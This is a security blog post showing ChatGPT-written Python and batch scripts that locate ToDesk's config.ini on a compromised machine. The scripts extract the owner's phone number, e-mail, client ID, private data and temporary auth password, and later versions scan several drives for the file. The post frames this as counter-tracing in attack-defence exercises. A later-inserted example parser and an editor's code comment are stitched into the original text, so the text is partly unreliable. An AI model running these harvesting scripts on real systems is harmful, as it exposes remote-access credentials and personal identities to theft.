Writing a ToDesk Traceback Automation Script with ChatGPT
VSole 2023-04-03 09:10:26
Preface
In attack-and-defense exercises, traceback and counter-attack scenarios come up regularly. Here we assume we have already connected to the attacker's server and found that the ToDesk remote desktop software is installed on the attacker's machine. If ToDesk is installed on your own machine as well, you will see a config.ini file in the ToDesk directory.

This file records a lot of interesting information, including:
downloadtimes: when ToDesk was downloaded
updatePassTime: when ToDesk was last used
Version: the ToDesk version number
clientid: the client ID
LoginPhone: the phone number of the logged-in account
LoginEmail: the e-mail address of the logged-in account

Writing the automation script with ChatGPT
Python script
We can ask ChatGPT to help us extract the key information listed above.


Now let's look at ChatGPT's masterpiece.


The ToDesk.py code is as follows:
# -*- coding: utf-8 -*-
import configparser

config_file = "C:/Program Files/ToDesk/config.ini"

config = configparser.ConfigParser()
config.read(config_file)

# Extract the configuration entries we need
download_times = config.get("ConfigInfo", "downloadtimes")
version = config.get("ConfigInfo", "Version")
client_id = config.get("ConfigInfo", "clientId")
temp_auth_pass_ex = config.get("ConfigInfo", "tempAuthPassEx")
resolution = config.get("ConfigInfo", "Resolution")
update_pass_time = config.get("ConfigInfo", "updatePassTime")
private_data = config.get("ConfigInfo", "PrivateData")
login_phone = config.get("ConfigInfo", "LoginPhone")
login_email = config.get("ConfigInfo", "LoginEmail")

# Print the results
print("*********** Todesk溯源小助手 ***********")
print(f"電子郵件賬戶:{login_email}")
print(f"手機號:{login_phone}")
print(f"下載時間:{download_times}")
print(f"最近一次使用ToDesk時間:{update_pass_time}")
print(f"當前屏幕尺寸:{resolution}")
print(f"Todesk版本號:{version}")
print(f"客戶端ID:{client_id}")
print(f"私密數據:{private_data}")
print(f"臨時認證密鑰:{temp_auth_pass_ex}")
print("*********** 公眾號:豬豬安全 ***********")
The output looks like this:

bat script

The Todesk.bat code is as follows:
@echo off
set "config_file=C:\Program Files\ToDesk\config.ini"

for /f "tokens=1,2 delims==" %%a in ('findstr /i /c:"downloadtimes=" /c:"Version=" /c:"clientId=" /c:"tempAuthPassEx=" /c:"Resolution=" /c:"updatePassTime=" /c:"PrivateData=" /c:"LoginPhone=" /c:"LoginEmail=" "%config_file%"') do (
    if "%%a" == "downloadtimes" set "download_times=%%b"
    if "%%a" == "Version" set "version=%%b"
    if "%%a" == "clientId" set "client_id=%%b"
    if "%%a" == "tempAuthPassEx" set "temp_auth_pass_ex=%%b"
    if "%%a" == "Resolution" set "resolution=%%b"
    if "%%a" == "updatePassTime" set "update_pass_time=%%b"
    if "%%a" == "PrivateData" set "private_data=%%b"
    if "%%a" == "LoginPhone" set "login_phone=%%b"
    if "%%a" == "LoginEmail" set "login_email=%%b"
)

echo *********** Todesk溯源小助手 ***********
echo 電子郵件賬戶:%login_email%
echo 手機號:%login_phone%
echo 下載時間:%download_times%
echo 最近一次使用ToDesk時間:%update_pass_time%
echo 當前屏幕尺寸:%resolution%
echo Todesk版本號:%version%
echo 客戶端ID:%client_id%
echo 私密數據:%private_data%
echo 臨時認證密鑰:%temp_auth_pass_ex%
echo *********** 公眾號:豬豬安全 ***********
pause
It can be run from cmd or simply double-clicked.

Optimizing the code
The code above has one problem: the path to config.ini is hard-coded. If ToDesk is not installed under the default path on the C: drive, the script cannot collect the data automatically. So we need to optimize further by adding a search step, and only run the automated collection once the file has been found.
Python code
We keep asking ChatGPT:


Here is the complete code:
ToDesk.py
# -*- coding: utf-8 -*-
import os
import sys
import configparser

target_filename = 'config.ini'
target_strings = ['ToDesk']

# Drive letters to search
drive_letters = ['C', 'D', 'E', 'F', 'G']

for drive_letter in drive_letters:
    drive_path = f"{drive_letter}:\\"
    # os.walk silently skips drives that do not exist or cannot be read
    for dirpath, dirnames, filenames in os.walk(drive_path):
        if target_filename in filenames and all(s in dirpath for s in target_strings):
            config_path = os.path.join(dirpath, target_filename)
            # config.ini found
            print(f"找到配置文件:{config_path}")

            # Parse the configuration file with ConfigParser
            config = configparser.ConfigParser()
            config.read(config_path)

            # Extract the relevant information
            download_times = config.get('ConfigInfo', 'downloadtimes')
            version = config.get('ConfigInfo', 'Version')
            client_id = config.get('ConfigInfo', 'clientId')
            temp_auth_pass = config.get('ConfigInfo', 'tempAuthPassEx')
            resolution = config.get('ConfigInfo', 'Resolution')
            update_pass_time = config.get('ConfigInfo', 'updatePassTime')
            private_data = config.get('ConfigInfo', 'PrivateData')
            login_phone = config.get('ConfigInfo', 'LoginPhone')
            login_email = config.get('ConfigInfo', 'LoginEmail')

            # Print the extracted information
            print("*********** Todesk溯源小助手 ***********")
            print(f"電子郵件賬戶:{login_email}")
            print(f"手機號:{login_phone}")
            print(f"下載時間:{download_times}")
            print(f"最近一次使用ToDesk時間:{update_pass_time}")
            print(f"當前屏幕尺寸:{resolution}")
            print(f"Todesk版本號:{version}")
            print(f"客戶端ID:{client_id}")
            print(f"私密數據:{private_data}")
            print(f"臨時認證密鑰:{temp_auth_pass}")
            print("*********** 公眾號:豬豬安全 ***********")

            # Stop searching once the configuration file has been found
            sys.exit(0)
As you can see, the script now locates the configuration file by itself and only extracts the data once the file has been found.
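Both scripts above use a default ConfigParser, which raises on the first missing key and on any value containing a bare "%", and they print phone numbers, e-mail addresses and the temporary auth password unmasked. As an added example that is not from the original post, the following parser reads the same [ConfigInfo] keys tolerantly and produces a redacted report; it runs against a constructed sample file, and all function and variable names are my own.

```python
# Added example (not from the original post): tolerant parsing and redacted
# reporting of the ToDesk config.ini keys listed in the post.
import configparser
import os

# Keys the post reads from the [ConfigInfo] section.
FIELDS = ["downloadtimes", "Version", "clientId", "tempAuthPassEx", "Resolution",
          "updatePassTime", "PrivateData", "LoginPhone", "LoginEmail"]
# Values that identify a person or grant access: masked before the report is shown.
SENSITIVE = {"tempAuthPassEx", "PrivateData", "LoginPhone", "LoginEmail"}

def parse_todesk_config(text):
    """Return a dict with every key in FIELDS; None where the key or section is absent."""
    # interpolation=None: a bare '%' in a value must not raise; strict=False: a duplicated key does not abort the parse.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return {key: cp.get("ConfigInfo", key, fallback=None) for key in FIELDS}

def redact(value, keep=2):
    """Keep the first `keep` characters and mask the rest; a missing value is labelled."""
    if value is None:
        return "<missing>"
    return value[:keep] + "*" * (len(value) - keep) if len(value) > keep else "*" * len(value)

def report(fields):
    """One 'key: value' line per field, with sensitive fields redacted."""
    return [f"{k}: {redact(fields[k]) if k in SENSITIVE else (fields[k] if fields[k] is not None else '<missing>')}"
            for k in FIELDS]

def find_config_files(roots, name="config.ini", marker="todesk"):
    """Walk each root (e.g. ['C:\\\\', 'D:\\\\']) and collect every config.ini under a ToDesk path."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):  # unreadable directories are skipped
            if name in files and marker in dirpath.lower():
                hits.append(os.path.join(dirpath, name))
    return hits

# Constructed sample (not a real ToDesk file): Resolution, updatePassTime,
# PrivateData and LoginEmail are deliberately left out.
SAMPLE = """[ConfigInfo]
downloadtimes=2023-04-01 10:00:00
Version=4.3.1
clientId=123456789
tempAuthPassEx=abcd1234
LoginPhone=13800000000
"""

if __name__ == "__main__":
    print("\n".join(report(parse_todesk_config(SAMPLE))))
```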

bat code

ToDesk.bat
@echo off
setlocal EnableDelayedExpansion

set SEARCH_DRIVE=C D E F G
set SEARCH_PATH=Program Files

set VERSION=
set CLIENT_ID=
set AUTH_PASS=
set RESOLUTION=
set UPDATE_TIME=
set PRIVATE_DATA=
set EMAIL=
set PHONE=
set DOWNLOAD_TIME=
set "INI_FILE=config.ini"

echo Searching for ToDesk configuration file...

for %%d in (%SEARCH_DRIVE%) do (
    for /f "tokens=*" %%p in ('dir /s /b "%%d:\%SEARCH_PATH%" 2^>nul ^| findstr /i /c:"ToDesk"') do (
        if exist "%%p\%INI_FILE%" (
            echo Found ToDesk configuration file at: "%%p\%INI_FILE%"
            set "CONFIG_FILE=%%p\%INI_FILE%"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"version="') do set "VERSION=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"clientId="') do set "CLIENT_ID=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"tempAuthPassEx="') do set "AUTH_PASS=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"Resolution="') do set "RESOLUTION=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"updatePassTime="') do set "UPDATE_TIME=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"PrivateData="') do set "PRIVATE_DATA=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"LoginEmail="') do set "EMAIL=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"LoginPhone="') do set "PHONE=%%j"
            for /f "tokens=1* delims==" %%i in ('type "!CONFIG_FILE!" ^| findstr /i /c:"downloadtimes="') do set "DOWNLOAD_TIME=%%j"
            goto :info_found
        )
    )
)

echo ToDesk configuration file not found.
goto :end

:info_found
echo.
echo *********** Todesk溯源小助手 ***********
echo 電子郵件賬戶:%EMAIL%
echo 手機號:%PHONE%
echo 下載時間:%DOWNLOAD_TIME%
echo 最近一次使用ToDesk時間:%UPDATE_TIME%
echo 當前屏幕尺寸:%RESOLUTION%
echo Todesk版本號:%VERSION%
echo 客戶端ID:%CLIENT_ID%
echo 私密數據:%PRIVATE_DATA%
echo 臨時認證密鑰:%AUTH_PASS%
echo *********** 公眾號:豬豬安全 ***********

REM The :end label was missing, so "goto :end" aborted the script with a label-not-found error
:end
pause

VSole
Cyber security expert